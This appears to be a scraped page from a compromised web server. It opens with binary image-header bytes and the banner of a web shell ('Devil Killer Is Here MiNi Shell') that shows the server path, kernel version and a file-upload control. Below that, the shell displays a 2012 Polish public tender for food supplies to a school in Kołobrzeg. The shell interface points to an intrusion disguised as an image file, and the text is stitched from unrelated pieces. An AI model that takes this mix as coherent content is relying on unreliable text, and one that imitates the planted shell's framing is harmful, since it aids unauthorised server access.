JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121206/493652-N-2012.html

<p class="kh_header"><b>Kołobrzeg: Dostawa artykułów w grupie - Różne produkty spożywcze</b><br>
<b>Numer ogłoszenia: 493652 - 2012; data zamieszczenia: 06.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Ekonomiczno-Hotelarskich im. Emilii Gierczak , ul. Łopuskiego 13, 78-100 Kołobrzeg, woj. zachodniopomorskie, tel. 0-94 35 115 55, faks 0-94 35 115 55.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów w grupie - Różne produkty spożywcze.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres zamówienia podany jest w załączniku nr 1 do SIWZ - zestawienie asortymentowo ilościowe na stronie www.ekonom.kolobrzeg.pl w zakładce przeatargi-załączniki.	
								
L.p.	                Nazwa  towaru	nazwa handlowa produktu	 J.m.	   Ilość	Cena	  Wartość	    Vat	   Wartość
					jednost.	    netto	     %	      brutto
					netto			
	Grupa G1 - oleje i tłuszcze zwierzęce lub roślinne							
								
1	Olej typu kujawski 1l lub równoważne		szt	100			1,08	
2	Olej typu kujawski 3l lub równoważne		szt	50			1,08	
3	Olej typu kujawski 5l lub równoważne		szt	200			1,08	
4	Oliwa z oliwek z pierwszego tłoczenia 0,5 l		szt	5			1,08	
5	Frytura 20 l		szt	10			1,08	
							1,08	
	Grupa G2- produkty przemiału ziarna , skrobi i produktów skrobiowych						1,08	
							1,08	
6	Mąka typu koszalińska lub równoważne typ 500		kg	1800			1,08	
7	Mąka kukurydziana 1 kg		kg	3			1,08	
8	Makaron np. typu Lubella muszelki , świderki, kolanka , rurki, wstążki, nitki, spaghetti, świderki,nitki-gniazda 0,500 kg  lub równoważne		szt	100			1,08	
9	Makaron typu Lubella muszelki, świderki,kolnka,rurki, wstążki, nitki, spaghetti, świderki, nitki-gniazda 3kg lub równoważne  		szt	220			1,08	
10	Makaron zacierka typu Lubella lub równoważne 0,250 kg		szt	20			1,08	
11	Kasza jęczmienna 1kg		szt	30			1,08	
12	Kasza gryczana 1kg		szt	100			1,08	
13	Kasza gryczana 0,50 kg		szt	10			1,08	
14	Ryż 1kg		szt	250			1,08	
15	Kasza manna 1kg		szt	5			1,08	
16	Groch łuskany połówki 0,50kg		szt	240			1,05	
17	Fasola JAŚ 0,50kg		szt	80			1,05	
18	Fasola JAŚ 5kg		szt	10			1,05	
19	Płatki owsiane 0,50kg		szt	10			1,08	
20	Płatki kukurydziane typu Nestle 0,25kg		szt	80			1,08	
21	Płatki kukurydziane typu Nestle0,50kg		szt	20			1,08	
22	Płatki kukurydziane typu Nestle1kg		szt	150			1,08	
23	Musli czekoladowe typu Nestle0,25kg		szt	10			1,08	
24	Musli czekoladowe typu Nestle0,50kg		szt	10			1,08	
25	Musli tradycyjne typu Nestle 0,35kg		szt	80			1,08	
26	Musli tropikalne typu Nestle 0,350kg		szt	80			1,08	
27	Musli miodowe typu Nestle0,250kg		szt	10			1,08	
28	Mąka  ziemniaczana 0,50kg		szt	10			1,08	
29	Mąka ziemniaczana 1 kg		szt	70			1,08	
30	Bułka tarta 0,50kg		szt	120			1,08	
							1,08	
	Grupa G3- owoce, warzywa i podobne produkty						1,08	
							1,08	
31	Brzoskwinie konserwowe w syropie 0,85kg		szt	150			1,08	
32	Ananasy plastry konserwowe w syropie 0,565 kg		szt	250			1,08	
33	Aromat do ciast 0,10 l		szt	700			1,23	
34	Rodzynki 0,10 kg		szt	100			1,08	
35	Gruszki w syropie 0,85 kg		szt	10			1,08	
36	Śliwki suszone bez pestek 0,150kg		szt	60			1,08	
37	Jabłka prażone szarlotka 0,90 kg		szt	30			1,08	
38	Jabłka prażone z brzoskwiniami 0,90  kg		szt	30			1,08	
39	Jabłka suszone		szt	3			1,08	
40	Owoce susz mieszanka		szt	3			1,08	
41	Orzechy laskowe  łuskane 0,100 kg      		szt	10			1,23	
42	Płatki migdałowe 0,075 kg		szt	40			1,08	
43	Migdały 0,100 kg		szt	20			1,08	
44	Wiórki kokosowe różne kolory 0,100kg		szt	70			1,08	
45	Wiórki kokosowe różne kolory 0,500kg		szt	10			1,23	
46	Orzechy włoskie łuskane 0,100 kg		szt	40			1,23	
47	Grzyby suszone 1 kg		szt	10			1,08	
48	Pieczarki konserwowe 0,90 kg		szt	60			1,08	
49	Oliwki czarne 0,935 kg		szt	10			1,08	
50	Oliwki czarne 0,358 kg		szt	40			1,08	
51	Oliwki zielone z papryką 0,358 kg		szt	15			1,08	
52	Oliwki zielone z papryką 0,935 kg		szt	5			1,08	
53	Kiełki soi 0,370kg		szt	30			1,08	
54	Kiełki soi Bonduell 0,400kg		szt	10			1,08	
55	Fasola konserwowa szparagowa 0,50kg		szt	350			1,08	
56	Fasola konserwowa szparagowa 0,72 kg		szt	10			1,08	
57	Groszek konserwowy 0,85 kg		szt	5			1,08	
58	Groszek konserwowy 0,425 kg		szt	250			1,08	
59	Kukurydza konserwowa 0,40 kg		szt	400			1,08	
60	Kukurydza konserwowa  0,34 kg		szt	10			1,08	
61	Kukurydza kolby 0,425 kg		szt	10			1,08	
62	Seler konserwowy 0,340 kg		szt	30			1,08	
63	Cebulka konserwowa biała 0,30 kg		szt	50			1,08	
64	Cebula konserwowa złota 0,30 kg		szt	50			1,08	
65	Papryka konserwowa 0,90 kg		szt	130			1,08	
66	Ogórki konserwowe 1,70 kg		szt	5			1,08	
67	Ogórki konserwowe 0,90 kg		szt	190			1,08	
68	Przecier ogórkowy 0,33kg		szt	100			1,08	
69	Kapusta czerwona konserwowa 0,90 kg		szt	300			1,08	
70	Fasola czerwona kons. 0,425kg		szt	50			1,08	
71	Fasola czerwona kons. Bonduell 0,40kg		szt	10			1,08	
72	Marchew konserwowa 0,90 szt		szt	5			1,08	
73	Mak 0,50 kg		szt	40			1,05	
74	Marchew z groszkiem konserwowa 0,90 kg		szt	5			1,08	
75	Szparagi 0,370 szt		szt	150			1,08	
76	Szparagi 0,212 szt		szt	30			1,08	
77	Szczaw konserwowy 0,330 kg		szt	5			1,08	
78	Szczaw konserwowy 0,90 szt		szt	60			1,08	
79	Sałatka obiadowa wielowarzywna 0.90kg		szt	50			1,08	
80	Chrzan konserwowy 0,270 kg		szt	80			1,08	
81	Ćwikła z chrzanem 0,270 kg		szt	20			1,08	
82	Koncentrat pomidorowy złoty bażant  0,85 kg lub równoważne		szt	210			1,08	
83	Koncentrat pomidorowy złoty bażant 0,425 kg  		szt	40			1,08	
84	Ketchup typu Włocławek  lub równowżne 1 kg		szt	260			1,08	
85	Ketchup typu Włocławek  lub równoważne 0,50 kg		szt	10			1,08	
86	Ketchup typu Włocławek  3 kg lub równoważne		szt	5			1,08	
87	Dżem truskawkowy lub wiśniowy 25g		szt	3000			1,08	
88	Dżem śliwkowy 25g		szt	3000			1,08	
89	Dżem śliwkowy 1,30 kg		szt	5			1,08	
90	Dżem z czarnej porzeczki 25g		szt	3000			1,08	
91	Dżem z czarnej porzeczki 1,30kg		szt	5			1,08	
92	Dżem  truskawkowy lub wiśniowy 0,310 kg		szt	10			1,08	
93	Dżem truskawkowy lub wiśniowy 1,30 kg		szt	2			1,08	
94	Dżem truskawkowy lub wiśniowy 7 kg		szt	2			1,08	
95	Dżem śliwkowy 7kg		szt	2			1,08	
96	Dżem z czarnej porzeczki 7 kg		szt	2			1,08	
97	Dzęm niskosłodzony 0,33 kg		szt	20			1,08	
98	Żurawina 0,30 kg		szt	30			1,08	
99	Borówki do mięsa 0,30 kg		szt	10			1,08	
100	Kompot truskawkowy  0,90 l		szt	200			1,08	
101	Kompot wiśniowy 0,90 l		szt	600			1,08	
102	Kompot z czarnej porzeczki 0,90 l		szt	600			1,08	
103	Kompot z aroni 0,90 l		szt	600			1,08	
104	Kompot śliwkowy 0,90 l		szt	50			1,08	
105	Czereśnie koktailowe 0,370 kg		szt	10			1,08	
106	Galaretki owocowe mix typu dr.Oetker lub równoważne  1 kg		szt	5			1,08	
107	Galaretki owocowe mix typu dr Oetker 0,090 kg		szt	170			1,08	
108	Kisiel o różnych smakach 0,038 kg		szt	30			1,08	
109	Budyń o różnych smakach 0,040 kg		szt	150			1,08	
110	Sos do lodów adwokat 1 kg		szt	5			1,08	
111	Sos owocowy mix 1 kg		szt	5			1,08	
112	Sos czekoladowy 1 kg		szt	5			1,23	
113	Syrop malinowy, truskawkowy, wiśniowy Łowicz 0,50 l lub równoważne		szt	15			1,08	
							1,08	
	Grupa G4 - różne produkty spożywcze						1,08	
							1,08	
114	Cukier 1 kg		szt	1500			1,08	
115	Cukier puder 0,50 kg		szt	90			1,08	
116	Cukier waniliowy 32 g		szt	700			1,08	
117	Cukier kostka		kg	5			1,08	
118	Herbata ekspresowa 100 szt Lipton lub równoważne		szt	350			1,23	
119	Herbata ekspresowa miętowa  20 szt		szt	400			1,23	
120	Herbata ekspresowa owocowa  20 szt		szt	500			1,23	
122	Kawa capuccino 1 kg		kg	5			1,23	
123	Kakao słodkie 0,2 kg		szt	35			1,23	
124	Kakao Wedel 0,10 kg lub równoważne		szt	60			1,23	
125	Kakao ciemne 0,20 kg lub równoważne		szt	10			1,23	
126	Majonez dekoracyjny typu Winiary 0,40 kg lub równoważne		szt	10			1,08	
127	Majonez dekoracyjny typu Winiary 0,70 kg lub równoważne		szt	50			1,08	
128	Majonez dekoracyjny typu Winiary 3 kg lub równoważne		szt	100			1,08	
129	Bulion z kury typu Winiary 120 g lub równoważne		szt	1000			1,08	
130	Bulion wołowy typu Winiary 120 g lub równoważne		szt	10			1,08	
131	Bulion grzybowy 120 g		szt	20			1,08	
132	Miód naturalny 1,250 kg		szt	5			1,05	
133	Miód wielokwiatowy 25g		szt	4000			1,05	
134	Miód wielokwiatowy 0,40 kg		szt	5			1,05	
135	Miód sztuczny 0,35 kg		szt	60			1,08	
136	Koperek suszony 250 g		szt	1			1,08	
137	Natka suszona 0,5 kg		szt	1			1,08	
138	Czosnek suszony 1 kg		szt	1			1,08	
139	Sól czosnkowa 20 g		szt	10			1,08	
140	Przyprawa do zup w płynie typu Winiary  1 l lub równoważne		szt	150			1,08	
141	Przyprawa do zupaw płynie Winiary 0,20 l lub równoważne		szt	10			1,08	
142	Kotlety wegetariańskie 0,250 kg		szt	20			1,08	
143	Liść laurowy 0,50 kg		szt	15			1,23	
144	Liść laurowy 0,06kg		szt	100			1,23	
145	Papryka słodka mielona 1 kg		szt	5			1,23	
146	Papryka słodka mielona 20 g		szt	100			1,23	
147	Papryka ostra mielona 15 g		szt	30			1,23	
148	Tymianek 15 g		szt	10			1,23	
149	Sól warzona paczkowana 1 kg		szt	350			1,23	
150	Musztarda 1 kg		szt	70			1,23	
151	Musztarda 0,50 kg		szt	10			1,23	
152	Musztarda 0,25 kg		szt	10			1,23	
153	Ocet spirytusowy 10 % 0,50 l		szt	40			1,23	
154	Ocet balsamiczny 0,250 l		szt	10			1,23	
155	Bazylia 10 g		szt	10			1,23	
156	Oregano 10 g		szt	10			1,23	
157	Przyprawa Degusta 1 kg lub równoważne		szt	250			1,08	
158	Przyprawa Degusta 200 g		szt	10			1,08	
159	Przyprawa Vegeta 1 kg lub równoważne		szt	5			1,08	
160	Przyprawa Vegeta 200 g		szt	10			1,08	
161	Kwasek cytrynowy 0,50 kg		szt	15			1,23	
162	Kwasek cytrynowy 20 g		szt	200			1,23	
163	Kurkuma 10 g		szt	10			1,23	
164	Tymianek 15 g		szt	10			1,23	
165	Majeranek 1 kg		szt	5			1,23	
166	Majeranek 0,50 kg		szt	3			1,23	
167	Majeranek 10 g		szt	100			1,23	
168	Soda oczyszczona 0,050 kg		szt	10			1,23	
169	Proszek do pieczenia 36g		szt	100			1,23	
170	Żelatyna spożywcza 1 kg		szt	10			1,08	
171	Żelatyna spożywcza 50 g		szt	10			1,08	
172	Cynamon 0,50 kg		szt	4			1,23	
173	Goździki 15g		szt	2			1,23	
174	Pieprz ziołowy 20 g		szt	20			1,23	
175	Pieprz naturalny czarny mielony 0,50 kg		szt	30			1,23	
176	Pieprz naturalny czarny mielony 20 g		szt	25			1,23	
177	Pieprz biały 15 g		szt	20			1,23	
178	Gałka muszkatałowa 20 g		szt	30			1,23	
179	Ziele angielskie 0,50 kg		szt	10			1,23	
180	Ziele angielskie 15 g		szt	25			1,23	
181	Sos tabasco 57 ml		szt	5			1,08	
182	Sos sojowy 0,623l		szt	10			1,08	
183	Woda mineralna gazowana 1,5l		szt	1200			1,23	
184	Woda mineralna gazowana 0,5l		szt	1000			1,23	
185	Woda mineralna niegazowana 1,5l		szt	2500			1,23	
186	Woda mineralna niegazowana 0,5l		szt	1000			1,23	
187	Czekolada mleczna Wedel 100 g lub równoważne		szt	10			1,23	
188	Czekolada mleczna bakaliowa Wedel  100 g lub równoważne		szt	5			1,23	
189	Czekolada gorzka typu Wedel 100 g lub równoważne		szt	10			1,23	
190	Baton typu Lion 43 g		szt	100			1,23	
191	Baton typu Pawełek 48 g		szt	100			1,23	
192	Baton typu Mars 50 g		szt	100			1,23	
193	Baton typu Snikers 50 g		szt	100			1,23	
194	Baton typu Kit _ Kat 50 g		szt	100			1,23	
195	Baton typu Bounty 50 g		szt	100			1,23	
196	Baton typu 3 Bit 58 g		szt	10			1,23	
197	Baton typu Bajeczny 50 g		szt	10			1,23	
198	Baton typu Twix 58 g		szt	10			1,23	
199	Delicje 136 g		szt	10			1,23	
200	Chipsy różne smaki 0,030 kg		szt	30			1,23	
201	Paluszki 100 g		szt	200			1,23	
202	Ciasteczka drobne		kg	60			1,23	
203	Ciasteczka drobne w czekoladzie		kg	60			1,23	
204	typu Mix Princessa  50 g		szt	200			1,23	
205	Pistacje 0,100 kg		szt	10			1,08	
206	Przyprawa do piernika 20 g		szt	20			1,23	
207	Kawa capuccino mix 10 szt 1 op.		op	6			1,23	
208	Wafle bez cukru 50 g		szt	20			1,23	
209	Biszkopty 170 g		szt	10			1,23	
210	Krakersy 180 g		szt	60			1,23	
211	Cukierki typu mieszanka Wedlowska		kg	10			1,23	
212	Cukierki czekoladowe typu Kejnoty 2,5 kg/op.		op.	4			1,23	
213	Przyprawa curry 0,5 kg.op		op.	8			1,23	
214	Cukier w saszetkach 200 szt op.		op.	20			1,08	
215	Kminek 0,02 kg		szt	20			1,23	
216	Posypka kolorowa 30 g		szt	10			1,23	
217	Słodzik 100 szt op.		op	40			1,08	
218	Zioła prowansalskie 1 kg		kg	1			1,23	
219	Chrupki kukurydziane 60 g		szt	10			1,08	
220	Mandarynki konserwowe 0,314 kg		szt	10			1,23	
221	Morela suszona 0,150 kg		szt	40			1,23	
222	Kawa inka 150g		szt	5			1,23	
223	Rurki waflowe 2 kgop.		op.	3			1,23	
224	makaron cannelloni 250g		szt	40			1,23	
225	makaron lazzania 1kg		kg	10			1,23	
226	sok typu Kubuś 03 l		szt	500			1,23	
227	suchary bezcukrowe 0,2kg		op	15			1,23	
228	mąka tortowa 1 kg		kg	50			1,23	
229	przecier ogórkowy 0,9		szt	120			1,23	
230	ryż paraboliczny 1 kg		kg	100			1,23	
231	czekolada biała 100g		szt	10			1,23	
232	biszkopty języczki 350g		szt	10			1,23	
233	pestki słonecznika 1000g		szt	10			1,23	
234	pestki dyni 1000g		szt	10			1,23	
								
	Wartość razem.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>do 20%</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>8. Wymagania dotyczące przedmiotu zamówienia
- wszystkie oferowane produkty muszą spełniać wymagania określone w ustawie o warunkach zdrowotnych i żywienia zawarte w przepisach o jakości handlowej artykułów rolno -spożywczych ( Dz. U. Nr 31 poz 265 z 2005 r.), oraz wymagania jakościowe zawarte w przepisach o jakości handlowej artykułów rolno- spożywczych ( Dz. U. 187 z 2005 roku).                                                                                               
- jakość oferowanych produktów przez Wykonawcę winna być najwyższa i odpowiadać wymaganiom Zamawiającego, który w załączniku asortymentowo-ilościowym przywołał nazwy własne produktów oczekując wyrobów porównywalnych jakościowo do wymienionych- równoważnych zgodnie z art.29 ust.3 ustawy Prawo Zamówień Publicznych z dn. 29 stycznia 2004 roku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania wiedzy i doświadczenia,
   Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
   Wymagane jest wykazanie przez Wykonawcę realizacji co najmniej 3 dostaw okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców                                                                                                                                                      
opis warunków udziału w zakresie wiedzy i doświadczenia
3)	 dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia
2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia
2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>j.w.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>j.w.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ekonom.kolobrezg.pl (zakładka -przetargi + link z BIP); zsehkolobrzeg.finn.pl (zakładka przetarg<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Łopuskiego 13, 78-100 Kołobrzeg, pok. 114.</p>
